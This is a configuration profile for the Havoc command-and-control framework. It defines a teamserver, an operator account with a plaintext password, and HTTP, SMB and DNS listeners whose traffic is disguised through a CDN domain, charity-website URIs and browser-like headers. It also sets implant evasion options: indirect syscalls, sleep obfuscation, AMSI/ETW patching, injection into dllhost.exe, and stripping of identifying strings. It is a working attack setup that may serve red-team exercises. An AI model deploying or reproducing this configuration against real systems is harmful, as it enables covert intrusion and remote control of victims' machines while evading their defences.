# Havoc C2 profile — generated by scripts/create_profile.py
# Reference: teamserver/pkg/profile/config.go

Teamserver {
    Host = "127.0.0.1"
    Port = 40056
}

Operators {

    user "kr0ff" {
        Password = "password1234"
    }

}

Listeners {

    Http {
        Name = "http-profile"
        Hosts = [
            "d1kue7sp12yu55.cloudfront.net",
        ]
        HostBind = "0.0.0.0"
        PortBind = 443
        PortConn = 443
        HostRotation = "random"
        Secure = true
        UserAgent    = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"

	  Cert {
        Cert = "/home/ubuntu/Havoc/cert/fullchain.pem"
			  Key = "/home/ubuntu/Havoc/cert/privkey.pem"
		  }

    Uris = [
      "/js/libs/jquery-1.6.3.min.js",
      "/contact-us.php",
      "/favicon.ico",
      "/blog/index.html",
			"/blog/category/united-states/index.html",
			"/blog/category/kenya/index.html",
			"/leadership/natalie-berg.php",
			"/sponsorships/index.html",
			"/sponsorships/charitable-institutions.php",
			"/mission.php",
			"/volunteer/index.html",
			"/projects/projects-us.php",
			"/projects/projects-ua.php",
			"/js/activatables.js"
      ]

    Headers = [
			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
			"Accept-Language: en-US,en;q=0.5",
			"Accept-Encoding: gzip, deflate, br",
			"Upgrade-Insecure-Requests: 1",
			"Sec-Fetch-Dest: document",
			"Sec-Fetch-Mode: navigate",
			"Sec-Fetch-Site: none",
			"Sec-Fetch-User: ?1"
      ]

    Response {
      Headers = [
        "Server: Nginx",
			  "ETag: 5045-607fab0c09f00-gzip",
			  "Accept-Ranges: bytes",
			  "Vary: Accept-Encoding",
        ]
      }

    }

    Smb {
        Name = "smb-profile"
        PipeName = "agent_pipe"
    }

    Dns {
        Name = "DNS-profile"
        Hosts = [
            "13.40.113.118",
        ]
        HostBind = "0.0.0.0"
        Port = 53
        ZoneDomain = "zone.forsec.pw"
        QueryTimeout = 5000
        ChunkDelayMs = 35

    }

}

Demon {
    Sleep = 10
    Jitter = 15

    IndirectSyscall  = true
    StackDuplication = true

    # Accepted: "WaitForSingleObjectEx", "Foliage", "Ekko", "Zilean"
    SleepTechnique = "Zilean"

    # Accepted: "None", "jmp rax", "jmp rbx" (only applies to Ekko/Zilean)
    SleepJmpGadget = "jmp rbx"

    # Accepted: "None (LdrLoadDll)", "RtlRegisterWait", "RtlCreateTimer", "RtlQueueWorkItem"
    ProxyLoading = "RtlQueueWorkItem"

    # Accepted: "None", "HWBP", "Hardware breakpoints"
    AmsiEtwPatching = "HWBP"

    # set to true for CDN usage
    TrustXForwardedFor = true

    Injection {
        Spawn64 = "C:\\Windows\\System32\\dllhost.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\dllhost.exe"

        # Accepted: "Win32", "Native/Syscall"
        Alloc   = "Native/Syscall"
        Execute = "Native/Syscall"
    }

    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.dll": "",
            "This program cannot be run in DOS mode.": "",
        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
        }
    }
}

